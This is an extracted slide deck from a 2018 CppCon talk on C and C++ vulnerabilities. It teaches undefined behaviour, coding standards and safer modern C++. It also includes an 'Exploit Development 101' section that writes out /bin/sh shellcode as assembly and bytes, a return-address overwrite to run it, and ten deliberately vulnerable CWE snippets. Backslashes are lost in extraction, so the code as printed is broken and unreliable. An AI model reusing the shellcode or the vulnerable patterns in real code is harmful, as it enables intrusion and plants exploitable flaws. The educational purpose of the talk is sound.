Software Vulnerabilities in C and C++ (CppCon 2018)

Software Vulnerabilities
in C and C++
@pati_gallardo Patricia Aas
CppCon 2018
T
S

Patricia Aas - Consultant
T
S
C++ Programmer, Application Security
Currently : T S
Previously : Vivaldi, Cisco Systems, Knowit, Opera Software
Master in Computer Science - main language Java
Pronouns: she/her

Undefined Behavior
What specs exist?
Compiler Optimizations
Exploit Development 101
Exploitability
Take your vitamins
The Eight I'd Really Rather You Didn'ts
@pati_gallardo

Undefined Behaviour
@pati_gallardo

undefined behavior
“Examples of undefined behavior are memory accesses outside of array bounds, signed
integer overflow, null pointer dereference, modification of the same scalar more than
once in an expression without sequence points, access to an object through a pointer of a
different type, etc. Compilers are not required to diagnose undefined behavior (although
many simple situations are diagnosed), and the compiled program is not required to do
anything meaningful.”
http://en.cppreference.com/w/cpp/language/ub
@pati_gallardo
6

- Don’t reason about undefined
behaviour
- Assume that it crashes or is
never executed
- Changing compiler, compiler
version or optimization level
can break your application
Undefined Behaviour

Infinite Loop
int main(void) {
complex<int> delta;
complex<int> mc[4] = {0};
for(int di = 0; di < 4; di++, delta = mc[di])
cout << di << endl;
}
(Thanks to @shafikyaghmour) https://stackoverflow.com/questions/32506643/c-compilation-bug
Undefined Behavior:
Access out of bounds
@pati_gallardo
8

Infinite Loop
Want to give it a try?
Compiler Explorer
https://godbolt.org/g/TDjM8h
Wandbox
https://wandbox.org/permlink/aAFP2bMjA3um3L4K
Github
https://github.com/patricia-gallardo/insecure-coding-examples/
blob/master/vulnerable/infinite_loop.cpp
@pati_gallardo
(Thanks to @shafikyaghmour) https://stackoverflow.com/questions/32506643/c-compilation-bug9

What specs exist?
@pati_gallardo

CG: C++ Core Guidelines (328 pages!)
@pati_gallardo

SEI: CERT C++ Coding Standard (435 pages!)
@pati_gallardo

CWE : Common Weakness Enumeration (1572 pages!)
@pati_gallardo

Compiler Optimization
@pati_gallardo

@pati_gallardo
The Case Of The Disappearing Memset
@pati_gallardo

CWE-14: Compiler Removal of Code to Clear Buffers
void GetData(char *MFAddr) {
char pwd[64];
if (GetPasswordFromUser(pwd, sizeof(pwd))) {
if (ConnectToMainframe(MFAddr, pwd)) {
// Interaction with mainframe
}
}
memset(pwd, 0, sizeof(pwd)); // <- Removed by the optimizer
}
SEI: MSC06-C. Beware of compiler optimizations
SEI: MEM03-C. Clear sensitive information stored in reusable resources
@pati_gallardo
18

Want to give it a try?
https://godbolt.org/g/FpEsht
@pati_gallardo
19
CWE-14: Compiler Removal of Code to Clear Buffers

Memset_s : Zeroing Memory
// Compliant Solution (C11)
memset_s(pwd, 0, sizeof(pwd));
// Windows Solution
SecureZeroMemory(pwd, sizeof(pwd));
@pati_gallardo
20

Exploit Development 101
@pati_gallardo

Smashing The Stack For Fun And Profit
Aleph One, Phrack Magazine issue 49
@pati_gallardo
23

Stack Overflow
Code: github.com/patricia-gallardo/insecure-coding-examples/
(directory: smashing)
Thanks to #security on #include Discord, especially Vesim and hthh
@pati_gallardo
24

Write C code for shellcode Compile it
Put bytes in a char buffer Put jmp addr on ret addr
@pati_gallardo
27
Write inline assembly, eliminating zero bytes

Shellcode - code that gives you shell
int execve(
const char *filename,
char *const argv[],
char *const envp[]);
@pati_gallardo
Target Process
Vulnerable
Program
Target Process
/bin/sh
Shellcode
28

int execve(
char *const argv[],
%rax : syscall number : 59 (x64)
%rdi : const char *filename
%rsi : const char *const argv[]
%rdx : const char *const envp[]
@pati_gallardo
29

C code for our shellcode
#include <unistd.h>
int main(void) {
char *name[2];
name[0] = "/bin/sh";
name[1] = NULL;
execve(name[0], name, NULL);
}
@pati_gallardo
30

@pati_gallardo
31

int main(void) {
__asm__(
"jmp push_stringnt"
"pop_string: pop %rdint"
…
"push_string: call pop_stringnt"
".string "/bin/sh"nt"
);
}
@pati_gallardo
32

int execve(
char *const argv[],
%rax : syscall number : 59 (x64)
@pati_gallardo
33

1. int main(void) {
2. __asm__(
3. "jmp push_stringnt"
4. "pop_string: pop %rdint"
5. "xor %rdx, %rdxnt"
6. "xor %rax, %raxnt"
7. "mov %rsp, %rsint"
8. "mov %rdx, 8(%rsp)nt"
9. "mov %rdi, (%rsp)nt"
10. "mov $0x3b, %alnt"
11. "syscallnt"
12. "push_string: call pop_stringnt"
13. ".string "/bin/sh"nt"
14. );
15. }
@pati_gallardo
int execve(
char *const argv[],
%rax : syscall 59
%rdi : filename
%rsi : argv[]
%rdx : envp[]
34

C code for our shellcode
#include <unistd.h>
int main(void) {
char *name[2];
name[0] = "/bin/sh";
name[1] = NULL;
execve(name[0], name, NULL);
}
@pati_gallardo
35

1. int main(void) {
2. __asm__(
11. "syscallnt"
14. );
15. }
@pati_gallardo
int execve(
char *const argv[],
%rax : syscall 59
%rdi : filename
%rsi : argv[]
%rdx : envp[]
36

argv[0] (%rsp) /bin/sh
argv[1] 8(%rsp) NULL
%rax : syscall number (59 x64)
%rdi /bin/sh
%rdx 0 (NULL)
%rax $0x3b (59, execve syscall #)
%rsi %rsp
Stack Registers
37

1. int main(void) {
2. __asm__(
11. "syscallnt"
14. );
15. }
@pati_gallardo
int execve(
char *const argv[],
%rax : syscall 59
%rdi : filename
%rsi : argv[]
%rdx : envp[]
38

int execve(
char *const argv[],
@pati_gallardo
Target Process
Vulnerable
Program
Target Process
/bin/sh
Shellcode
39

@pati_gallardo
41

$ objdump -d shellcodeasm | grep main -C 20

1. int main(void) {
2. __asm__(
11. "syscallnt"
14. );
15. }
@pati_gallardo
int execve(
char *const argv[],
%rax : syscall 59
%rdi : filename
%rsi : argv[]
%rdx : envp[]
43

char shellcode[] =
"xebx17" // jmp push_string
"x5f" // pop_string: pop %rdi
"x48x31xd2" // xor %rdx, %rdx
"x48x31xc0" // xor %rax, %rax
"x48x89xe6" // mov %rsp, %rsi
"x48x89x54x24x08" // mov %rdx, 8(%rsp)
"x48x89x3cx24" // mov %rdi,(%rsp)
"xb0x3b" // mov $0x3b,%al
"x0fx05" // syscall
"xe8xe4xffxffxff" // callq pop_string
"/bin/sh";
@pati_gallardo
44

@pati_gallardo
45

int main(void) {
intptr_t *ret;
ret = (intptr_t *) &ret + 2;
(*ret) = (intptr_t) shellcode;
}
The Exploit: How to run your shell code
@pati_gallardo
46

Wat?
What Happened to our
Stack Overflow?
@pati_gallardo
47

Write direction vs Stack growing direction
100 Return address
99 <something>
98 char array item 3
Stack
grows
toward
lower
addresses
Writes go
toward
higher
addresses
ptr++
48

100 char[5]: “ret” address 95
98 char[3]: Shellcode
96 char[1]: No-op
95 char[0]: No-op
Stack
grows
toward
lower
addresses
Writes go
toward
higher
addresses
ptr++
49

96 char[1]: No-op
95 char[0]: No-op
Stack
grows
toward
lower
addresses
Instruction
addresses
also go
toward
higher
addresses
50

1. Unsigned Integer Wraparound
2. Signed Integer Overflow
3. Numeric Truncation
4. Stack Buffer Overflow
5. Heap Buffer Overflow
6. Buffer Underflow
7. Use After Free
8. Double Free
9. Incorrect Type Conversion
10. Uncontrolled Format String
@pati_gallardo

Code is on GitHub:
https://github.com/patricia-gallardo/insecure-coding-examples
@pati_gallardo
54

1) Unsigned Integer Wraparound
2) Signed Integer Overflow
3) Numeric Truncation Error
@pati_gallardo
55

1) CWE-190: Unsigned Integer Wraparound
int main(void) {
unsigned int first_len = UINT_MAX;
unsigned int second_len = 256;
unsigned int buf_len = 256;
char first[first_len], second[second_len], buf[buf_len];
if((first_len + second_len) <= 256) { // <- sum == 255
memcpy(buf, first, first_len);
memcpy(buf + first_len, second, second_len);
}
}
SEI-INT30-C. Ensure that unsigned integer operations do not wrap
@pati_gallardo
56

2) CWE-190: Signed Integer Overflow
int main(void) {
int first_len = INT_MAX;
int second_len = 256;
int buf_len = 256;
if((first_len + second_len) <= 256) { // <- UB (negative)
}
}
SEI-INT32-C. Ensure that operations on signed integers do not result in
@pati_gallardo
57

3) CWE-197: Numeric Truncation Error
int main(void) {
unsigned int first_len = UINT_MAX - 256;
unsigned int second_len = 256;
unsigned int buf_len = 256;
int new_len = (first_len+second_len); // IDB (negative)
if(new_len <= 256) {
}
} SEI-INT31-C. Ensure that integer conversions do not result in lost or misinterpreted data
@pati_gallardo
58

4) Stack-based Buffer Overflow
5) Heap-based Buffer Overflow
6) Buffer Underwrite/Underflow
@pati_gallardo
59

4) CWE-121: Stack-based Buffer Overflow
int main(void) {
char buffer[10];
// CWE-242: Inherently Dangerous Function
gets(buffer); // <- Write outside
}
SEI-STR31-C. Guarantee that storage for str. has sufficient space for character data and the null terminator
@pati_gallardo
60

5) CWE-122: Heap-based Buffer Overflow
int main(int argc, char * argv[]) {
char* buf = (char*)malloc(sizeof(char)*10);
strcpy(buf, argv[1]); // <- Write outside
free(buf);
}
SEI-ARR38-C. Guarantee that library functions do not form invalid pointers
@pati_gallardo
61

6) CWE-124: Buffer Underwrite / Underflow
int main(void) {
char src[12];
strcpy(src, "Hello World");
size_t length = strlen(src);
int index = (length -1);
while (src[index] != ':') {
src[index] = '0';
index--;
}
}
SEI-ARR30-C. Do not form or use out-of-bounds pointers or array subscripts
@pati_gallardo
62

7) Use After Free
8) Double Free
@pati_gallardo
63

7) CWE-416: Use After Free
int main(void) {
char* buffer = (char*)malloc (256);
bool error = true;
if (error)
free(buffer);
// [...]
printf("%lun", strlen(buffer)); //Use after free
}
SEI-MEM30-C. Do not access freed memory
@pati_gallardo
64

8) CWE-415: Double Free
int main(void) {
char* buffer = (char*)malloc (256);
bool error = true;
if (error)
free(buffer);
// [...]
free(buffer); // second free
}
SEI-MEM51-CPP. Properly deallocate dynamically allocated resources
@pati_gallardo
65

9) Incorrect Type Conversion/Cast
10) Use of External Format String
@pati_gallardo
66

9) CWE-704: Incorrect Type Conversion/Cast
struct A {};
struct B {};
int main(void) {
struct A * a = (struct A *) malloc (sizeof (struct A));
struct B * b = (struct B *) a; // cast to unrelated type
}
SEI-EXP05-CPP. Do not use C-style casts
@pati_gallardo
67

10) CWE-134: Use of External Format String
char * format = argv[1];
char * str = argv[2];
printf(format, str);
}
$ ./format_string "%s %d" "Hello World"
Hello World 1745066888
SEI-FIO47-C. Use valid format strings
@pati_gallardo
68

Use Your Tools
@pati_gallardo @pati_gallardo

Classes of Tools
- Several compilers
- Warnings / Errors
- Instrumentation
- Static Analysis
- Automated Tests
- Fuzzing
- Continuous Integration
- Libraries
@pati_gallardo
71

The Eight I'd Really Rather You Didn'ts*
*The Eight Condiments (Pastafarianism)
@pati_gallardo
73

Caution: Don’t take me too
seriously. But seriously, think
about it! *wink*
@pati_gallardo
74

The Eight I'd Really
Rather You Didn'ts
1. Use C
2. Allocate with new
3. Do math a lot
4. Trust your external input
5. Use pointers a lot
6. Write “clever” code
7. Use shared_ptr a lot
8. Share state a lot
@pati_gallardo
75

1. I'd Really Rather You Didn't:
Use CCG : CPL.1: Prefer C++ to C
@pati_gallardo
76

CG : R: Resource management
CG : R.11: Avoid calling new
and delete explicitly
Allocate With New
@pati_gallardo
77

Do Math A Lot
@pati_gallardo
78

@pati_gallardo
Trust Your External Input79

Use Pointers a Lot
@pati_gallardo
80

Write “clever” code
@pati_gallardo
81

Use shared_ptr a Lot
@pati_gallardo
82

Share State a Lot
@pati_gallardo
83

T
S
P f .
Patricia Aas, T S
@pati_gallardo

Expanding on Some of
the points

The Eight I'd Really
Rather You Didn'ts
1. Use C
2. Allocate with new
3. Do math a lot
4. Trust your external input
5. Use pointers a lot
6. Write “clever” code
7. Use shared_ptr a lot
8. Share state a lot
@pati_gallardo
87

Use CCG : CPL.1: Prefer C++ to C
@pati_gallardo
88

Std::string - Concatenate Strings
int main() {
std::string first = "Hello ";
std::string second = "World";
std::string buffer = first + second;
std::cout << buffer << "n";
}
@pati_gallardo
89

Std::cout/cin : Using the Command Line
std::string second;
std::cin >> second;
std::string first = argv[1];
std::string buffer = first + second;
std::cout << buffer << "n";
}
$ ./command_line "Hello "
World
Hello World
@pati_gallardo
90

Algorithms : Strip after Colon
int main() {
string str = "Hello:World";
auto colon = [](int ch) { return ch == ':'; };
auto first = find_if(rbegin(str), rend(str), colon);
str.erase(first.base(), end(str));
}
@pati_gallardo
91

C++ Casts : Safe Downcasting
class Spiderman {};
class Ironman {};
int main() {
Spiderman * peter = new Spiderman;
Ironman * tony = static_cast<Ironman*>(peter);
}
inheritance.cpp:6:20: error: static_cast from 'Spiderman *'
to 'Ironman *', which are not related by inheritance, is not
allowed
Ironman * tony = static_cast<Ironman*>(peter);
^~~~~~~~~~~~~~~~~~~~~~~~~~~~
1 error generated.
@pati_gallardo
92

CG : R: Resource management
CG : R.11: Avoid calling new
and delete explicitly
Allocate With New93
@pati_gallardo

Allocating on the Stack
#include "Hero.h"
int main()
{
Hero h;
}
@pati_gallardo
@pati_gallardo

Where is it?
Stack
Hero stackHero;
Heap
unique_ptr<Hero> heapHero =
make_unique<Hero>();
Hero * heapHero = new Hero();
@pati_gallardo
@pati_gallardo

Loving the Stack
#include <iostream>
#include <string>
using namespace std;
int main()
{
{
string s("Hello World!");
cout << s;
} // <- GC happens here!
}
@pati_gallardo
@pati_gallardo

Using the Stack To Manage Resource Lifetimes
Destroyed when exiting scope
Deterministic Garbage Collection
@pati_gallardo

Hold a Value on the Stack that
Controls The Lifetime of Your Heap
Allocated Object
using namespace std;
{
unique_ptr<Hero> myHero =
make_unique<Hero>();
shared_ptr<Hero> ourHero =
make_shared<Hero>();
}
Smart Pointers
@pati_gallardo

Do Math A Lot
@pati_gallardo
99

Primitive types have no semantics, only limits
Reduce the value space
Keep it within defined behavior
Enum class, string literals, user defined
literals, size_t
@pati_gallardo100

Enum Class
enum class Direction : char
{ NORTH = 'N', EAST = 'E', WEST = 'W', SOUTH = 'S' };
std::ostream& operator << (std::ostream& os, const Direction& obj) {
os << static_cast<std::underlying_type<Direction>::type>(obj);
return os;
}
int main() {
std::cout << "t" << Direction::NORTH << "n"
<< "t" << Direction::EAST << "n"
<< "t" << Direction::WEST << "n"
<< "t" << Direction::SOUTH << "n";
}
@pati_gallardo
101

String Literals
using namespace std::literals::string_literals;
int main() {
auto heroes = {"Spiderman"s, "Ironman"s, "Wonder Woman"s};
for(auto const & hero : heroes) {
std::cout << "t" << hero << "n";
}
}
@pati_gallardo
102

1) User Defined Literals
int main() {
auto h = 24_hours;
auto d = 7_days;
auto err = h + d;
}
user_defined_literals.cpp:25:21: error: invalid operands to
binary expression ('Hours' and 'Days')
auto err = hours + days;
~~~~~ ^ ~~~~
1 error generated.
@pati_gallardo
103

struct Hours {
explicit Hours(unsigned long long n) : num(n) {}
unsigned long long num = 0;
};
struct Days {
explicit Days(unsigned long long n) : num(n) {}
unsigned long long num = 0;
};
@pati_gallardo
104

Hours operator "" _hours(unsigned long long num) {
return Hours(num);
}
Days operator "" _days(unsigned long long num) {
return Days(num);
}
@pati_gallardo
105

Use Size_t for Sizes
- Unsigned integer type
- Result of the sizeof
operator
- Use for object sizes
- Use for array indexing and
loop counting
@pati_gallardo
106

@pati_gallardo
Trust Your External Input107

Taint
- Is the source of this value
in your code?
- Command line args, size
fields in headers, exported
functions, APIs
@pati_gallardo
108

So… what should I remember from this
presentation?
@pati_gallardo
109

Well, I'd Really Rather You Didn't:
Use C
@pati_gallardo
110

Learn some Modern C++ Instead!
@pati_gallardo
111

Bjarne Stroustrup
“C makes it easy to shoot yourself in the
foot; C++ makes it harder, but when you do
it blows your whole leg off.”
@pati_gallardo
112

Bjarne Stroustrup
“Within C++, there is a much smaller and
cleaner language struggling to get out.”
@pati_gallardo
113

Software Vulnerabilities in C and C++ (CppCon 2018)

More Related Content

What's hot

Similar to Software Vulnerabilities in C and C++ (CppCon 2018)

More from Patricia Aas

Recently uploaded

Software Vulnerabilities in C and C++ (CppCon 2018)